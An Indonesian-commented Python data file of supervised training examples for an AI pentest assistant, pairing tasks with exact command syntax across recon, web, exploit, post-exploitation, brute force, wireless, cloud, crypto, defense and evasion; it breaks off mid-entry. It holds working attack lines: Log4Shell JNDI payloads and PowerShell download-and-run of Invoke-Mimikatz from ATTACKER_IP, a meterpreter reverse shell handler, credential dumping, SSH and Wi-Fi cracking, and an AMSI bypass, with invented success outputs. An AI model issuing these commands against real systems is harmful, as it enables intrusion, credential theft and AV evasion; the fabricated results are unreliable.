from ds_part1 import _e

# ══════════════════════════════════════════════════════════════════════════════
# DS PART 6 — Correct command syntax, semua 15 kategori
# Fix hallucination: tool names, flags, syntax yang bener
# ══════════════════════════════════════════════════════════════════════════════

# ─── 1. RECON ────────────────────────────────────────────────────────────────
RECON6 = [
    _e("Lakukan subdomain enumeration lengkap terhadap target.com",
       ["subfinder untuk passive subdomain discovery dari berbagai sumber",
        "amass untuk active + passive enumeration dengan DNS brute force",
        "httpx untuk filter subdomain yang live dan return HTTP 200"],
       ["run subfinder passive", "run amass active", "filter live dengan httpx", "sort unique"],
       ["subfinder -d target.com -silent -o subfinder_out.txt",
        "amass enum -passive -d target.com -o amass_out.txt",
        "cat subfinder_out.txt amass_out.txt | sort -u > all_subs.txt",
        "httpx -l all_subs.txt -silent -status-code -o live_subs.txt",
        "wc -l live_subs.txt"],
       [("subfinder", "passive subdomain discovery"), ("amass", "active+passive DNS enum"),
        ("httpx", "filter live subdomains")],
       "httpx -silent flag penting agar output bersih untuk pipeline berikutnya",
       "subfinder → amass → httpx pipeline adalah standar recon subdomain profesional",
       "professional",
       "subfinder: 45 subs. amass: 67 subs. Total unique: 89. Live (httpx): 34 subdomains aktif."),

    _e("Gunakan dnsx untuk validasi dan resolve semua subdomain",
       ["dnsx untuk bulk DNS resolution dari list subdomain",
        "bisa filter by record type: A, CNAME, MX, TXT, NS",
        "output bisa JSON untuk parsing otomatis"],
       ["siapkan list subdomain", "run dnsx bulk resolve", "parse output JSON"],
       ["dnsx -l all_subs.txt -a -cname -resp -silent -o dnsx_out.txt",
        "dnsx -l all_subs.txt -a -resp-only -silent | sort -u > resolved_ips.txt",
        "cat dnsx_out.txt | jq '.a[]' 2>/dev/null | sort -u"],
       [("dnsx", "bulk DNS resolution dan validation")],
       "dnsx -resp flag menampilkan IP hasil resolve langsung di output",
       "dnsx adalah tool golang dari projectdiscovery, jauh lebih cepat dari dig untuk bulk",
       "analytical",
       "dnsx resolve 89 subdomains → 34 resolved dengan IP, 55 NXDOMAIN/timeout."),

    _e("Gunakan theHarvester untuk OSINT email dan domain intelligence",
       ["theHarvester mengumpulkan emails, subdomains, hosts dari search engines",
        "sources: google, bing, linkedin, hunter, securitytrails, shodan",
        "output XML/HTML untuk laporan formal"],
       ["run theHarvester multi-source", "ekstrak emails", "ekstrak subdomains"],
       ["theHarvester -d target.com -b google,bing,linkedin -l 500",
        "theHarvester -d target.com -b hunter,securitytrails -l 200 -f output",
        "theHarvester -d target.com -b all -l 300 -f full_harvest"],
       [("theHarvester", "OSINT email subdomain dari search engines")],
       "flag -l membatasi jumlah hasil per source untuk hindari rate limiting",
       "theHarvester: -d domain, -b sources, -l limit, -f output filename (tanpa ekstensi)",
       "professional",
       "theHarvester: 18 emails, 23 subdomains, 5 IPs dari google+bing+linkedin."),

    _e("Port scanning dengan nmap untuk service discovery",
       ["nmap -sV untuk service version detection",
        "nmap -sC untuk default scripts",
        "-p- untuk scan semua 65535 port",
        "-T4 untuk speed yang reasonable"],
       ["quick scan top ports dulu", "full port scan", "service version scan", "script scan"],
       ["nmap -sV -sC -p 80,443,22,8080,8443,3306,5432 target.com -oN quick_scan.txt",
        "nmap -p- -T4 --min-rate 1000 target.com -oN full_ports.txt",
        "nmap -sV -sC -p $(cat full_ports.txt | grep open | awk -F/ '{print $1}' | tr '\\n' ',') target.com -oN service_scan.txt",
        "nmap --script vuln -p 80,443 target.com -oN vuln_scan.txt"],
       [("nmap", "port scanning dan service detection")],
       "--min-rate 1000 untuk speed tanpa terlalu agresif, -oN untuk save output",
       "nmap workflow: top ports → full ports → service scan → vuln scripts",
       "professional",
       "nmap: 12 open ports. Services: SSH 22, HTTP 80, HTTPS 443, MySQL 3306, Redis 6379."),
]

# ─── 2. SCAN ─────────────────────────────────────────────────────────────────
SCAN6 = [
    _e("Gunakan nuclei untuk vulnerability scanning dengan templates",
       ["nuclei menggunakan YAML templates untuk detect vulnerabilities",
        "update templates dulu sebelum scan: nuclei -update-templates",
        "filter by severity: critical,high untuk prioritas"],
       ["update templates", "scan dengan severity filter", "scan target specific"],
       ["nuclei -update-templates",
        "nuclei -u https://target.com -severity critical,high -o nuclei_out.txt",
        "nuclei -u https://target.com -t cves/ -o cve_results.txt",
        "nuclei -l live_subs.txt -severity critical,high,medium -o bulk_scan.txt",
        "nuclei -u https://target.com -t exposures/ -t misconfiguration/ -o misconfig.txt"],
       [("nuclei", "template-based vulnerability scanner")],
       "selalu -update-templates dulu, templates lama bisa miss CVE terbaru",
       "nuclei -u URL, -l listfile, -t template_folder, -severity filter, -o output",
       "professional",
       "nuclei: 3 critical (Log4Shell, SQLi, RCE), 7 high, 12 medium vulnerabilities found."),

    _e("Web vulnerability scan dengan nikto",
       ["nikto web server scanner untuk detect misconfigurations dan vulnerabilities",
        "scan headers, cookies, default files, outdated software",
        "output ke file untuk dokumentasi"],
       ["basic scan", "scan dengan SSL", "save output"],
       ["nikto -h https://target.com -o nikto_out.txt -Format txt",
        "nikto -h https://target.com -ssl -o nikto_ssl.txt",
        "nikto -h https://target.com -Tuning 1234567 -o full_nikto.txt",
        "nikto -h target.com -p 8080,8443 -o alt_ports.txt"],
       [("nikto", "web server vulnerability dan misconfiguration scanner")],
       "nikto -Tuning: 1=XSS, 2=file upload, 3=misconfig, 4=injection, 5=info disclosure",
       "nikto: -h host, -p port, -ssl untuk HTTPS, -o output, -Format txt/html/csv",
       "analytical",
       "nikto: outdated Apache 2.4.41, missing security headers, directory listing enabled."),

    _e("API security testing dengan curl dan ffuf",
       ["API endpoints sering expose sensitive data jika tidak properly secured",
        "ffuf untuk API endpoint discovery",
        "curl untuk manual testing authentication bypass"],
       ["discover endpoints", "test authentication", "check for IDOR", "test input validation"],
       ["ffuf -u https://api.target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc 200,201,301 -o api_endpoints.json",
        "curl -s https://api.target.com/v1/users -H 'Authorization: Bearer TOKEN'",
        "curl -s https://api.target.com/v1/users/1 -H 'Authorization: Bearer TOKEN'",
        "curl -s https://api.target.com/v1/users/2 -H 'Authorization: Bearer TOKEN'",
        "curl -X POST https://api.target.com/v1/login -d '{\"user\":\"admin\",\"pass\":\"admin\"}' -H 'Content-Type: application/json'"],
       [("ffuf", "API endpoint fuzzing"), ("curl", "manual HTTP request testing")],
       "IDOR test: ganti ID di URL, jika bisa akses data user lain = vulnerable",
       "ffuf: -u URL dengan FUZZ placeholder, -w wordlist, -mc status codes filter",
       "professional",
       "ffuf: 23 endpoints found. IDOR di /api/v1/users/{id}: bisa akses semua user data."),
]

# ─── 3. WEB ──────────────────────────────────────────────────────────────────
WEB6 = [
    _e("SQL Injection testing dengan sqlmap",
       ["sqlmap automated SQL injection detection dan exploitation",
        "gunakan --level dan --risk untuk coverage lebih dalam",
        "--dbs untuk enumerate databases, --dump untuk extract data"],
       ["identify injection point", "run sqlmap basic", "enumerate DB", "dump tables"],
       ["sqlmap -u 'https://target.com/page?id=1' --dbs --batch",
        "sqlmap -u 'https://target.com/page?id=1' -D target_db --tables --batch",
        "sqlmap -u 'https://target.com/page?id=1' -D target_db -T users --dump --batch",
        "sqlmap -u 'https://target.com/login' --data='user=admin&pass=test' --dbs --batch",
        "sqlmap -r request.txt --level=5 --risk=3 --dbs --batch"],
       [("sqlmap", "automated SQL injection testing")],
       "--batch flag untuk skip manual prompts, -r untuk load dari Burp request file",
       "sqlmap: -u URL, --data POST params, -r request file, --dbs, --tables, --dump",
       "professional",
       "sqlmap: MySQL 5.7, databases: information_schema, target_db, admin_panel. Users table dumped."),

    _e("Directory dan file discovery dengan gobuster dan ffuf",
       ["gobuster dir untuk brute force directories dan files",
        "ffuf lebih cepat dan flexible dengan filter options",
        "gunakan wordlist yang relevan: common.txt, big.txt, raft"],
       ["run gobuster dir", "run ffuf untuk files", "check interesting files"],
       ["gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -x php,html,txt,bak -t 50 -o gobuster_out.txt",
        "ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -mc 200,301,302,403 -o ffuf_out.json",
        "ffuf -u https://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -mc 200 -o files_out.json",
        "gobuster dir -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100"],
       [("gobuster", "directory brute forcing"), ("ffuf", "fast web fuzzer")],
       "ffuf lebih cepat karena Go-based, gobuster lebih stable untuk large wordlists",
       "gobuster: -u URL, -w wordlist, -x extensions, -t threads. ffuf: -u URL FUZZ, -w wordlist",
       "analytical",
       "gobuster: /admin (301), /backup (403), /config.bak (200), /.git (301) found."),

    _e("XSS testing dengan manual payload dan dalfox",
       ["XSS Cross-Site Scripting untuk inject malicious JavaScript",
        "dalfox automated XSS scanner yang fast dan accurate",
        "test reflected, stored, dan DOM-based XSS"],
       ["manual XSS test", "run dalfox scan", "test stored XSS"],
       ["dalfox url https://target.com/search?q=test --silence",
        "dalfox url 'https://target.com/page?param=test' -o xss_results.txt",
        "dalfox file urls.txt --silence -o bulk_xss.txt",
        "curl 'https://target.com/search?q=<script>alert(1)</script>'",
        "curl 'https://target.com/search?q=\"><img src=x onerror=alert(1)>'"],
       [("dalfox", "automated XSS scanner"), ("curl", "manual XSS payload testing")],
       "dalfox lebih akurat dari XSStrike karena pattern-based + DOM analysis",
       "dalfox: url single target, file untuk bulk URLs, --silence untuk clean output",
       "professional",
       "dalfox: 3 reflected XSS di search, comment, username fields. Stored XSS di profile bio."),
]

# ─── 4. EXPLOIT ──────────────────────────────────────────────────────────────
EXPLOIT6 = [
    _e("Exploit CVE-2021-44228 Log4Shell dengan PoC",
       ["Log4Shell adalah RCE critical di Apache Log4j 2.x via JNDI injection",
        "payload dikirim via HTTP headers yang di-log oleh aplikasi",
        "JNDI callback ke attacker server untuk confirm vulnerability"],
       ["setup JNDI server", "send payload via headers", "catch callback", "deploy payload"],
       ["# Setup listener dulu",
        "nc -lvnp 9999",
        "# Test dengan curl - inject di User-Agent header",
        "curl -H 'User-Agent: ${jndi:ldap://ATTACKER_IP:1389/a}' https://target.com/",
        "curl -H 'X-Forwarded-For: ${jndi:ldap://ATTACKER_IP:1389/a}' https://target.com/",
        "# Gunakan nuclei template untuk bulk test",
        "nuclei -u https://target.com -t cves/2021/CVE-2021-44228.yaml -o log4shell.txt"],
       [("nuclei", "Log4Shell CVE template scanning"), ("curl", "manual payload injection")],
       "test semua HTTP headers yang mungkin di-log: User-Agent, X-Api-Version, Referer",
       "Log4Shell: payload ${jndi:ldap://IP:PORT/path} di-inject ke header yang di-log aplikasi",
       "professional",
       "Log4Shell confirmed via JNDI callback. Target running Log4j 2.14.1. RCE achieved."),

    _e("Metasploit framework untuk exploit dan post-exploitation",
       ["msfconsole untuk interactive exploitation framework",
        "search CVE atau service untuk cari module yang tepat",
        "set RHOSTS, LHOST, LPORT sebelum run"],
       ["launch msfconsole", "search module", "configure options", "run exploit"],
       ["msfconsole -q",
        "msf6 > search type:exploit platform:linux rank:excellent",
        "msf6 > use exploit/multi/handler",
        "msf6 > set PAYLOAD linux/x64/meterpreter/reverse_tcp",
        "msf6 > set LHOST 0.0.0.0",
        "msf6 > set LPORT 4444",
        "msf6 > run",
        "msf6 > search cve:2021-44228",
        "msf6 > use exploit/multi/misc/log4shell_header_injection"],
       [("msfconsole", "exploitation framework"), ("meterpreter", "post-exploitation shell")],
       "msfconsole -q untuk quiet mode, skip banner. use exploit/multi/handler untuk catch shells",
       "msf: search, use, show options, set RHOSTS/LHOST/LPORT, check, run/exploit",
       "professional",
       "Metasploit: meterpreter session opened on target. Session ID: 1. Running as www-data."),
]

# ─── 5. POST_EXPLOIT ─────────────────────────────────────────────────────────
POST6 = [
    _e("Linux privilege escalation dengan LinPEAS",
       ["LinPEAS automated script untuk find privesc vectors di Linux",
        "check SUID, sudo rights, cron jobs, writable paths, kernel exploits",
        "output color-coded: red = high priority vectors"],
       ["download linpeas", "run dan capture output", "analyze results"],
       ["curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o linpeas.sh",
        "chmod +x linpeas.sh",
        "./linpeas.sh 2>/dev/null | tee linpeas_out.txt",
        "./linpeas.sh -a 2>/dev/null | tee linpeas_full.txt",
        "grep -i 'CVE\\|SUID\\|sudo\\|password\\|writable' linpeas_out.txt"],
       [("linpeas", "automated Linux privilege escalation enumeration")],
       "flag -a untuk all checks (lebih lambat tapi comprehensive), output tee ke file",
       "linpeas output: yellow=interesting, red=high privesc probability, multicolor=critical",
       "professional",
       "LinPEAS: SUID /usr/bin/find, sudo ALL nopasswd www-data, cron job writable script found."),

    _e("Windows privilege escalation dengan winPEAS",
       ["winPEAS.exe untuk automated Windows privilege escalation enumeration",
        "check registry, services, scheduled tasks, credentials, unquoted paths",
        "output bisa di-filter untuk category tertentu"],
       ["transfer winpeas ke target", "run winpeas", "analyze output"],
       ["# Transfer via python HTTP server",
        "python3 -m http.server 8080",
        "# Di target Windows (PowerShell):",
        "Invoke-WebRequest -Uri http://ATTACKER_IP:8080/winPEASx64.exe -OutFile winpeas.exe",
        ".\\winpeas.exe > winpeas_out.txt 2>&1",
        ".\\winpeas.exe quiet cmd fast > winpeas_fast.txt",
        ".\\winpeas.exe systeminfo userinfo processinfo > focused.txt"],
       [("winpeas", "automated Windows privilege escalation enumeration")],
       "winpeas quiet cmd fast untuk quick scan, tanpa flags untuk full comprehensive scan",
       "winpeas categories: systeminfo, userinfo, processinfo, servicesinfo, applicationsinfo",
       "professional",
       "winPEAS: AlwaysInstallElevated enabled, unquoted service path C:\\Program Files\\App\\svc.exe."),

    _e("Dump credentials dengan Mimikatz",
       ["Mimikatz untuk extract credentials dari Windows memory (LSASS)",
        "sekurlsa::logonpasswords untuk dump plaintext passwords dan NTLM hashes",
        "lsadump::sam untuk dump SAM database"],
       ["run mimikatz", "dump logon passwords", "dump SAM", "export tickets"],
       ["# PowerShell download dan run",
        "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/Invoke-Mimikatz.ps1')",
        "Invoke-Mimikatz -Command '\"sekurlsa::logonpasswords\"'",
        "# Direct execution",
        "mimikatz.exe",
        "mimikatz # privilege::debug",
        "mimikatz # sekurlsa::logonpasswords",
        "mimikatz # lsadump::sam",
        "mimikatz # sekurlsa::tickets /export",
        "mimikatz # kerberos::list /export"],
       [("mimikatz", "Windows credential extraction dari LSASS"),
        ("pypykatz", "Python alternative untuk mimikatz")],
       "privilege::debug harus sukses dulu sebelum sekurlsa::logonpasswords bisa run",
       "mimikatz: privilege::debug → sekurlsa::logonpasswords → lsadump::sam",
       "professional",
       "Mimikatz: Administrator NTLM hash: aad3b435b51404eeaad3b435b51404ee:hash. 3 plaintext passwords dumped."),
]

# ─── 6. BRUTE_FORCE ──────────────────────────────────────────────────────────
BRUTE6 = [
    _e("SSH brute force dengan hydra",
       ["hydra untuk network login brute forcing",
        "-l untuk single username, -L untuk username list",
        "-p untuk single password, -P untuk password list"],
       ["prepare wordlists", "run hydra SSH", "try common credentials"],
       ["hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com -t 4 -V",
        "hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://target.com -t 4",
        "hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://target.com:22 -t 6 -f",
        "hydra -l admin -p admin ssh://target.com",
        "hydra -C /usr/share/wordlists/ftp-betterdefault.txt ftp://target.com"],
       [("hydra", "network protocol brute force tool")],
       "-f flag untuk stop after first valid credential found, -t untuk parallel tasks",
       "hydra: -l user, -L userlist, -p pass, -P passlist, -t threads, -f stop on first",
       "professional",
       "hydra: [22][ssh] host: target.com login: admin password: Password123! found after 1847 attempts."),

    _e("Password cracking offline dengan hashcat",
       ["hashcat GPU-accelerated password cracking",
        "identify hash type dulu dengan hashid atau haiti",
        "mode: -a 0 dict attack, -a 3 brute force, -a 6 hybrid"],
       ["identify hash type", "run hashcat dictionary", "run rules attack"],
       ["hashid '$2y$10$hash'",
        "hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt",
        "hashcat -m 0 md5_hashes.txt /usr/share/wordlists/rockyou.txt",
        "hashcat -m 1800 sha512_hashes.txt /usr/share/wordlists/rockyou.txt",
        "hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule",
        "hashcat -m 1000 ntlm_hashes.txt -a 3 ?u?l?l?l?d?d?d?d",
        "hashcat --show -m 1000 ntlm_hashes.txt"],
       [("hashcat", "GPU-accelerated offline password cracking"),
        ("hashid", "identify hash type")],
       "hashcat -m modes: 0=MD5, 1000=NTLM, 1800=sha512crypt, 3200=bcrypt, 13100=Kerberoast",
       "hashcat workflow: hashid → identify mode → dict attack → rules → brute force",
       "professional",
       "hashcat: 3/5 hashes cracked. admin:Summer2024!, user1:Password1, svc:Welcome123"),

    _e("Web login brute force dengan hydra dan ffuf",
       ["hydra http-post-form untuk brute force web login",
        "format: 'path:params:failure_string'",
        "ffuf untuk custom POST request fuzzing"],
       ["identify login mechanism", "run hydra web", "run ffuf password spray"],
       ["hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form '/login:username=^USER^&password=^PASS^:Invalid credentials' -t 10",
        "hydra -l admin -P passwords.txt target.com https-post-form '/wp-login.php:log=^USER^&pwd=^PASS^:ERROR' -t 5",
        "ffuf -u https://target.com/login -X POST -d 'user=admin&pass=FUZZ' -w /usr/share/wordlists/rockyou.txt -fc 200 -mc 302"],
       [("hydra", "web login brute forcing"),
        ("ffuf", "HTTP fuzzing untuk password spray")],
       "hydra http-post-form: path:POST_params:failure_indicator — failure string dari response saat login gagal",
       "hydra web: http-post-form '/path:user=^USER^&pass=^PASS^:Invalid' — perhatikan failure string!",
       "professional",
       "hydra: admin:admin123 found di /login setelah 523 attempts. WordPress login berhasil."),
]

# ─── 7. WIRELESS ─────────────────────────────────────────────────────────────
WIRELESS6 = [
    _e("WPA2 password capture dan cracking dengan aircrack-ng suite",
       ["airmon-ng untuk enable monitor mode pada wireless interface",
        "airodump-ng untuk capture handshake WPA2",
        "aireplay-ng untuk deauth client agar handshake cepat tertangkap",
        "aircrack-ng untuk crack handshake dengan wordlist"],
       ["enable monitor mode", "capture handshake", "deauth client", "crack dengan wordlist"],
       ["airmon-ng check kill",
        "airmon-ng start wlan0",
        "airodump-ng wlan0mon",
        "airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon",
        "aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon",
        "aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt",
        "airmon-ng stop wlan0mon"],
       [("airmon-ng", "monitor mode management"),
        ("airodump-ng", "packet capture dan handshake"),
        ("aireplay-ng", "deauthentication attack"),
        ("aircrack-ng", "WPA2 handshake cracking")],
       "airmon-ng check kill untuk matikan NetworkManager yang interferensi capture",
       "aircrack suite: airmon-ng start → airodump-ng capture → aireplay-ng deauth → aircrack crack",
       "professional",
       "WPA2 handshake captured. aircrack: KEY FOUND! [ Password123 ] setelah 45 seconds."),

    _e("Wireless scan dan monitoring dengan wifite dan kismet",
       ["wifite automated wireless auditing tool",
        "kismet untuk passive wireless monitoring dan device tracking",
        "scan semua nearby networks sebelum target specific"],
       ["scan networks", "run wifite automated", "monitor dengan kismet"],
       ["iwconfig",
        "wifite --wpa --wps -i wlan0 --kill",
        "wifite -i wlan0mon --dict /usr/share/wordlists/rockyou.txt",
        "kismet -c wlan0",
        "kismet --no-ncurses-wrapper"],
       [("wifite", "automated wireless auditing"),
        ("kismet", "passive wireless monitoring")],
       "wifite --kill untuk auto-kill interfering processes, --dict untuk custom wordlist",
       "wifite lebih user-friendly dari manual aircrack suite, bagus untuk quick assessment",
       "analytical",
       "wifite: 8 networks found. 2 WPS enabled (vulnerable). 1 WPA2 handshake captured."),
]

# ─── 8. CLOUD ────────────────────────────────────────────────────────────────
CLOUD6 = [
    _e("AWS security audit dengan prowler dan pacu",
       ["prowler untuk comprehensive AWS security assessment",
        "pacu untuk AWS exploitation framework (authorized pentest)",
        "aws cli untuk manual investigation"],
       ["configure AWS credentials", "run prowler audit", "investigate findings dengan pacu"],
       ["aws configure",
        "prowler aws --profile default -M json -o prowler_report",
        "prowler aws -c check11,check12,check13 -M csv",
        "prowler aws --service iam s3 ec2 -M json",
        "python3 pacu.py",
        "Pacu > import_keys default",
        "Pacu > run iam__enum_permissions",
        "Pacu > run iam__privesc_scan"],
       [("prowler", "AWS security audit dan compliance"),
        ("pacu", "AWS exploitation framework"),
        ("aws cli", "manual AWS investigation")],
       "prowler -M json untuk machine-readable output, pacu untuk test exploitability temuan",
       "prowler: compliance checks, best practices. pacu: exploitation dan privesc testing",
       "professional",
       "prowler: 47 findings. Critical: S3 public, IAM no MFA. pacu: iam:PassRole privesc confirmed."),

    _e("S3 bucket enumeration dan misconfiguration check",
       ["aws s3 ls untuk list bucket contents jika ada akses",
        "s3scanner untuk mass S3 bucket enumeration",
        "check public access, ACL, bucket policy"],
       ["enumerate buckets", "check public access", "download sensitive files"],
       ["aws s3 ls s3://target-bucket --no-sign-request",
        "aws s3 ls s3://target-company-backup --no-sign-request",
        "aws s3 cp s3://target-bucket/sensitive.txt . --no-sign-request",
        "aws s3api get-bucket-acl --bucket target-bucket",
        "aws s3api get-bucket-policy --bucket target-bucket",
        "s3scanner scan --bucket target-bucket",
        "python3 -c \"import boto3; s3=boto3.client('s3'); print(s3.list_buckets())\""],
       [("aws s3", "S3 bucket access dan enumeration"),
        ("s3scanner", "mass S3 bucket misconfiguration scanner")],
       "--no-sign-request untuk akses public bucket tanpa credentials",
       "aws s3 ls s3://bucket-name --no-sign-request untuk test public access",
       "professional",
       "S3 public bucket found: target-company-backup. Contents: db_backup.sql, config.env, keys.json"),

    _e("Kubernetes security assessment",
       ["kubectl untuk interact dengan K8s cluster",
        "kube-hunter untuk automated K8s vulnerability scanning",
        "check RBAC misconfigurations dan exposed services"],
       ["check kubectl access", "enumerate namespaces", "run kube-hunter", "check RBAC"],
       ["kubectl get nodes",
        "kubectl get namespaces",
        "kubectl get pods --all-namespaces",
        "kubectl get secrets --all-namespaces",
        "kubectl auth can-i --list",
        "kubectl auth can-i create pods --namespace kube-system",
        "kube-hunter --remote target.com",
        "kube-hunter --pod"],
       [("kubectl", "Kubernetes cluster management dan enumeration"),
        ("kube-hunter", "automated K8s vulnerability scanner")],
       "kubectl auth can-i --list untuk check semua permissions yang kita punya",
       "kube-hunter --pod untuk run dari dalam pod (lebih dalam akses), --remote untuk external",
       "professional",
       "kube-hunter: anonymous API access, secrets readable, privileged pod possible. Critical findings: 3"),
]

# ─── 9. CRYPTO ───────────────────────────────────────────────────────────────
CRYPTO6 = [
    _e("Identify dan crack berbagai jenis hash",
       ["hashid untuk identify hash type dari format",
        "haiti untuk alternative hash identification",
        "hashcat atau john untuk cracking"],
       ["identify hash format", "determine cracking mode", "crack dengan hashcat"],
       ["echo '$2y$10$examplehash' | hashid",
        "echo 'aad3b435b51404eeaad3b435b51404ee' | hashid",
        "haiti 'hash_value'",
        "hashcat --example-hashes | grep -A2 'NTLM'",
        "john --list=formats | grep -i ntlm",
        "hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt --force",
        "john --format=NT hash.txt --wordlist=/usr/share/wordlists/rockyou.txt"],
       [("hashid", "hash type identification"),
        ("hashcat", "GPU hash cracking"),
        ("john", "CPU hash cracking")],
       "hashcat lebih cepat (GPU), john lebih flexible untuk hash types yang obscure",
       "hash modes: MD5=0, SHA1=100, SHA256=1400, NTLM=1000, bcrypt=3200, sha512crypt=1800",
       "analytical",
       "hashid: NTLM detected. hashcat -m 1000: cracked dalam 2.3 detik. Password: Summer2024"),

    _e("SSL/TLS security assessment dengan testssl.sh",
       ["testssl.sh comprehensive TLS/SSL vulnerability scanner",
        "check cipher suites, protocols, certificate, vulnerabilities",
        "detect: BEAST, CRIME, POODLE, Heartbleed, DROWN"],
       ["run testssl basic", "check specific vulnerabilities", "save report"],
       ["testssl.sh https://target.com",
        "testssl.sh --severity HIGH https://target.com",
        "testssl.sh --heartbleed --ccs-injection target.com:443",
        "testssl.sh --protocols --ciphers https://target.com",
        "testssl.sh --jsonfile report.json --htmlfile report.html https://target.com"],
       [("testssl.sh", "comprehensive SSL/TLS vulnerability assessment")],
       "testssl.sh --severity HIGH untuk filter hanya high severity findings",
       "testssl.sh: comprehensive SSL check. --jsonfile untuk structured output, --htmlfile untuk report",
       "professional",
       "testssl.sh: TLS 1.0 enabled (deprecated), RC4 cipher supported, certificate expires in 7 days."),
]

# ─── 10. DEFENSE ─────────────────────────────────────────────────────────────
DEFENSE6 = [
    _e("Setup dan konfigurasi Wazuh SIEM agent",
       ["Wazuh SIEM untuk log collection, threat detection, compliance",
        "install Wazuh agent di endpoint, connect ke Wazuh manager",
        "konfigurasi di /var/ossec/etc/ossec.conf (BUKAN wad.conf)"],
       ["install agent", "register ke manager", "configure rules", "verify monitoring"],
       ["# Install Wazuh agent di Linux",
        "curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | gpg --no-default-keyring --keyring gnupg-ring:/usr/share/keyrings/wazuh.gpg --import",
        "echo 'deb [signed-by=/usr/share/keyrings/wazuh.gpg] https://packages.wazuh.com/4.x/apt/ stable main' | tee /etc/apt/sources.list.d/wazuh.list",
        "apt-get update && apt-get install wazuh-agent",
        "WAZUH_MANAGER='MANAGER_IP' WAZUH_AGENT_NAME='endpoint01' apt-get install wazuh-agent",
        "systemctl enable wazuh-agent && systemctl start wazuh-agent",
        "# Config file location:",
        "cat /var/ossec/etc/ossec.conf",
        "/var/ossec/bin/agent_control -l"],
       [("wazuh-agent", "endpoint security monitoring agent")],
       "Wazuh config: /var/ossec/etc/ossec.conf — BUKAN wad.conf atau ossec-agent.conf",
       "Wazuh agent config: /var/ossec/etc/ossec.conf. Manager di /var/ossec/etc/shared/",
       "professional",
       "Wazuh agent running. Connected to manager. Monitoring: syslog, auditd, file integrity."),

    _e("YARA rule untuk malware detection",
       ["YARA rules untuk pattern matching dan malware classification",
        "buat custom rules berdasarkan IoC: strings, hex patterns, conditions",
        "scan file, proses, atau memory dengan yara"],
       ["buat YARA rule", "test rule", "scan directory", "scan memory"],
       ["# Buat YARA rule",
        "cat > ransomware_detect.yar << 'EOF'\nrule Ransomware_Generic {\n  meta:\n    description = \"Generic ransomware indicator\"\n    author = \"NEXUS\"\n  strings:\n    $s1 = \"Your files have been encrypted\" nocase\n    $s2 = \".locked\" nocase\n    $s3 = \"bitcoin\" nocase\n    $hex1 = { 52 61 6E 73 6F 6D }\n  condition:\n    2 of them\n}\nEOF",
        "yara ransomware_detect.yar /path/to/suspicious/file",
        "yara -r ransomware_detect.yar /home/",
        "yara -r /etc/yara-rules/ /var/www/html/",
        "yara -p 10 rules.yar /"],
       [("yara", "pattern-based malware detection dan classification")],
       "yara -r untuk recursive scan, -p untuk parallel threads, nocase untuk case-insensitive",
       "YARA condition: all of them (semua match), any of them, 2 of them, filesize < 500KB",
       "analytical",
       "YARA: 3 files matched Ransomware_Generic rule. Paths: /tmp/update.exe, /home/user/doc.exe"),

    _e("Zeek network monitoring untuk threat detection",
       ["Zeek (formerly Bro) untuk network traffic analysis dan logging",
        "generate logs: conn.log, dns.log, http.log, ssl.log, weird.log",
        "detect anomalies dari log analysis"],
       ["run zeek capture", "analyze logs", "detect threats"],
       ["zeek -i eth0",
        "zeek -r capture.pcap",
        "zeek -r capture.pcap local",
        "cat conn.log | zeek-cut id.orig_h id.resp_h id.resp_p proto duration | sort -t$'\\t' -k5 -nr | head -20",
        "cat dns.log | zeek-cut query answers | grep -v '^-' | sort | uniq -c | sort -nr | head -20",
        "cat http.log | zeek-cut host uri method status_code | grep ' 200 ' | head -20",
        "cat weird.log"],
       [("zeek", "network traffic analysis dan threat detection")],
       "zeek-cut untuk extract specific fields dari Zeek TSV logs",
       "Zeek logs: conn.log (connections), dns.log, http.log, ssl.log, weird.log (anomalies)",
       "analytical",
       "Zeek: 15k connections logged. Suspicious: 3 hosts dengan high bytes_out, DNS tunneling detected."),
]

# ─── 11. EVASION ─────────────────────────────────────────────────────────────
EVASION6 = [
    _e("AMSI bypass untuk PowerShell execution",
       ["AMSI (Antimalware Scan Interface) memblock malicious PowerShell",
        "bypass dengan patch AMSI di memory sebelum load malicious script",
        "teknik: amsi.dll patch, reflection, obfuscation"],
       ["check AMSI aktif", "apply bypass", "verify bypass", "load payload"],
       ["# Check AMSI",
        "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')",
        "# AMSI bypass (authorized testing)",
        "$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')",
        "$b=$a.GetField('amsiInitFailed','NonPublic,Static')",
        "$b.SetValue($null,$true)",
        "# Verify",
        "'AmsiScanBuffer'",
        "# Alternative: obfuscation",
        "Set-Variable -Name am -Value ([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'))",
        "$am.GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"],
       [("powershell", "AMSI bypass dan script execution")],
       "AMSI bypass hanya valid untuk sesi PowerShell saat ini, tidak persistent",
       "AMSI bypass: patch amsiInitFailed field ke true agar AmsiScanBuffer tidak dipanggil",
       "professional",
       "AMSI bypass successful. amsiInitFailed = True. PowerShell scripts load tanpa AV detection."),

    _e("Living off the Land (LOLBAS) untuk execution tanpa binary custom",
       ["LOLBAS: gunakan Windows built-in tools untuk evade AV",
        "certutil untuk download file, mshta untuk execute HTA, regsvr32 untuk DLL",
        "bypass application whitelisting dengan signed Microsoft binaries"],
